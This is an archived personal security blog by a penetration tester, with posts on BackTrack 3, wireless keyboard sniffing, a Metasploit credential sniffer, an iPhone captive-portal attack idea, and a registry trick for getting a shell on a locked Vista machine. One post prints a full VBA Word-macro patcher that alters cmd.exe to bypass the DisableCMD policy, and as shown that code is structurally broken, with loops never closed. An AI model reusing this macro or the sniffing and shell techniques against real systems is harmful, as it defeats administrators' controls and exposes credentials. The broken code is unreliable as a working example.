Wednesday, February 10, 2010

Integrated blog into

Hey people, since backtrack is now not on anymore, i decided to blog straight into the news area on the website so please go to for new posts.



Thursday, December 10, 2009

18$ Gigabit ExpressCard Ethernet Works in Mac

Wow, i am amazed. I just found the time to plug in the ExpressCard Ethernetadapter into my mac.

Tada... just works beautiful.. cool for just 18$ you cant go wrong.

Tuesday, September 01, 2009

DisableCMD - History Repeating

Before I start. This is nothing new! Actually its known since many years (e.g.

During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.

I am not any good in coding vba but it might save someone some time. I will add an example.doc on as well.

Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object

Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D

Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean

gotbad = False

Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"

Dim tmpbyte As Byte

If Dir(Sourcefile) = "" Then Exit Sub
FileCopy Sourcefile, Destfile
F1 = FreeFile
Open Sourcefile For Binary As F1

F2 = FreeFile
Open Destfile For Binary As F2

While Not EOF(F1)
gotbad = False

Get #F1, , tmpbyte
If tmpbyte = bytepattern(patternoffset) Then
fileoffset = (Seek(F1) - 1)

While (gotbad = False)
Get #F1, , tmpbyte
patternoffset = patternoffset + 1
If tmpbyte = bytepattern(patternoffset) Then
If patternoffset > 18 Then
'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
Put #F2, fileoffset + 6, &H34
Close F1
Close F2
MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
End If
patternoffset = 0
gotbad = True
End If
End If
Close F1
Close F2
End Sub

Monday, August 10, 2009

Psnuffle password sniffer for metasploit

I submitted a new version of the psnuffle credential sniffer addon to the metasploit team. Until HDM has reviewed it and merged it into the svn i uploaded a tgz to's code section Please note that it will be removed when its officially available within the metasploit svn. Checkout the demo video if you like to see it in action. Currently i included pop3, imap, ftp and a HTTP Get sniffer module. Modules are very simple to code, so i expect new ones every few days.

Psnuffle credentials sniffing module demo from Max Moser on Vimeo.

With psnuffle metasploit got a credential sniffer in place. Its easy to use and extens. Writing a new module just takes some minutes.

Monday, July 13, 2009

Keykeriki on the new PCB's

Today i just finished my first Keykeriki hardware on the professionally manufactured PCB's. When everything works fine, we can go into mass-production :-). There where no major problems during soldering, except that the pre-drilled holes for the antenna connector are to small. Simple to solve: Either cut of the ground connectors and solder it directly onto it or file the legs/connectors to a smaller shape using a dremel.

Monday, July 06, 2009


Lothar informed me about a strange behaviour of the iPhone running OS 3. It seems like the iPhone is automatically opening a browser when joining a network. (See video of the whole probleme here:

The iPhone tries to do the following:

1. DNS querries for
2. Opening

When both are successful, then fine... the phone gets back "success" and everything is ok.
When both are failing... thats fine as well because then the phone assumes that the internet connection is not up and running.

BUT <-- isn't there always a BUT?!

If the phone can succcessfully querry the name but get back any different content than "Success"
it assumes that there is a captive portal which requires you to authenticate first to get access to the internet.

This is true for many hotspots etc... so Apple was thinking.. damn thats annoying for the user... lets open up
Safari automatically if this special case comes into place :-)

Usability kills security .... together with karmetasploit its a very evil thing. Get Iphones cookies, accounts and maybe even
system control... depending on the bugs you have left to test.

You can see the whole thing as a video @vimeo .... now lets find some new safari bugs :-)

And thank you lothar for the fish.

Tuesday, June 09, 2009

Keykeriki faux-pas

What a shame, we released the software package yesterday and removed the schematics at the same time. Sorry for that, both tar.gz's are now back on the website. Btw we have about 80 TRF7900 receiver chips in stock if someone want to build a Keykeriki, just contact us using email.



Thursday, June 04, 2009

Keykeriki vs. Logitech Round 1

Here is a picture of the information gathered using my Keykeriki and an oscilloscope. This image shows the sequence patterns needed to implement the parser for Logitech keyboards. Important side-note: Logitech uses standard miller symbols not the Microsoft variants.

If you dont know what Keykeriki is.. its an open-source, universal wireless keyboard sniffing project. Checkout

Labels: , , , ,

Monday, June 01, 2009

27Mhz Wireless Keyboard Sniffer Released

1.5 years after releasing our whitepaper "27Mhz Wireless Keyboard Analysis Report" about wireless keyboard insecurities, we are proud to present the universal wireless keyboard sniffer: Keykeriki. This opensource hardware and software project enables every person to verify the security level of their own keyboard transmissions, and/or demonstrate the sniffing attacks (for educational purpose only). The hardware itself is designed to be small and versatile, it can be extended to currently undetected/unknown keyboard traffic, and/or hardware extensions, for example, a repeating module or amplifier. Checkout for further information, schematics and more. We will provide pcb's as soon they are ready.



Monday, December 22, 2008

OSX 10.5.6 Mail crash and recover

Well again we had a major security update on OSX. Guess what, mail terminates with segmentation fault during startup.

After researching and debugging around on my system i found out that GPGMail Bundle plugin was the Problem. Uninstall that Bundle from your $HOME/Library/Mail/Bundles directory.

Day saved...gpg back to console and over and out.


Tuesday, September 23, 2008

Locked yourself out of Vista?

During some computer hardening work i managed to lock myself out of the system completely. Unfortunately it is a standalone system, so no re-apply domain gpo was possible. Also the restrictive firewall settings and sharing configuaration did not allow me to use any of the leet tricks like psexe, remote registry etc.

Because i still had physical access to the system i tried to delete the .pol file on the system at c:\Windows\System32\GroupPolicyUsers\

So i still was locked out and was trying every trick i know...until i came up to this one:

1) Download the chntpw iso at
2) Boot system with that one and use the registry editor to go to the SYSTEM hive
2) Cd into the Setup key
3) Edit the CmdLine value to cmd.exe
4) Edit the SetupType value to 2
5) Reboot and you will get a dosbox
6) Start mmc or gpoedit.msc
7) type Exit.


thanks to the original idea poster over here:

Monday, June 30, 2008

Over 150'000 downloads in about a week

Well I think it is amazing how far this Backtrack Project is gone. We already have over 150'000 Downloads since we released the version 3 at June 19th. This does not include any unofficial mirrors and/or torrents that are available. Roughly this translates in over 100Terrabyte of Data transmitted in ONE WEEK! When i see this number i would wish that i get only 1$ for every download :-)

Anyway i am impressed again and again by those numbers. Since years we keep the lines hot and the community able to test these great tools within an easy environment without the need of an installation. See you soon.

Wednesday, June 25, 2008

Even my mailbox praises me :-)

Lately when i was checking my mail, i recognize a funny thing. Checkout the number of Messages :-) I must be real hacker then when even my mailbox praises me as 1337 :-)

See you later..same blog..different content

Friday, June 20, 2008

Backtrack 3 released today

I am proud to announce that we have released backtrack yesterday at the
interview with pauldotcom.

Muts, Martin and I have slaved for weeks and months, together with the
help of many remote-exploit'ers to bring you this fine release. As
usual, this version overshadows the previous ones with extra cool


Unfortunately, Tenable would not allow for redistribution of Nessus.

Fortunately, SAINT *has* provided BackTrack users with a functional
version of SAINT, pending a free request for an IP range license
through the SAINT website, valid for 1 year.

The guys over at Paterva have created a special version of Maltego
v2.0 with a community license especially for BackTrack users. We would
like to thank Paterva for co-operating with us and allowing us to
feature this amazing tool in BackTrack.

Kernel Yes, yes, stop whining....We had serious deliberations
concerning the BT3 kernel. We decided not to upgrade to a newer kernel
as wireless injection patches were not fully tested and verified. We
did not want to jeopardize the awesome wireless capabilities of BT3
for the sake of sexiness or slightly increased hardware
compatibilities. All relevant security patches have been applied.

As usual, updated, sharpened, SVN'ed and armed to the teeth. This
release we have some special features such as spoonwep, fastrack and
other cool additions.

For the first time we distribute three different version of Backtrack 3
- CD Version
- USB Version with Compiz
- VMWare version including the VMWTools and some special Addons

Final Requests
We request the community to not mirror or torrent this release, or
otherwise distribute it online without our knowledge. We are trying to
gather precise statistics about bt3 downloads. If you would like to
mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.


Problems, fixes, bugs, opinions - should all end up in our Remote
Exploit community forums, and our wiki:

Over and out,

Max, Muts, Martin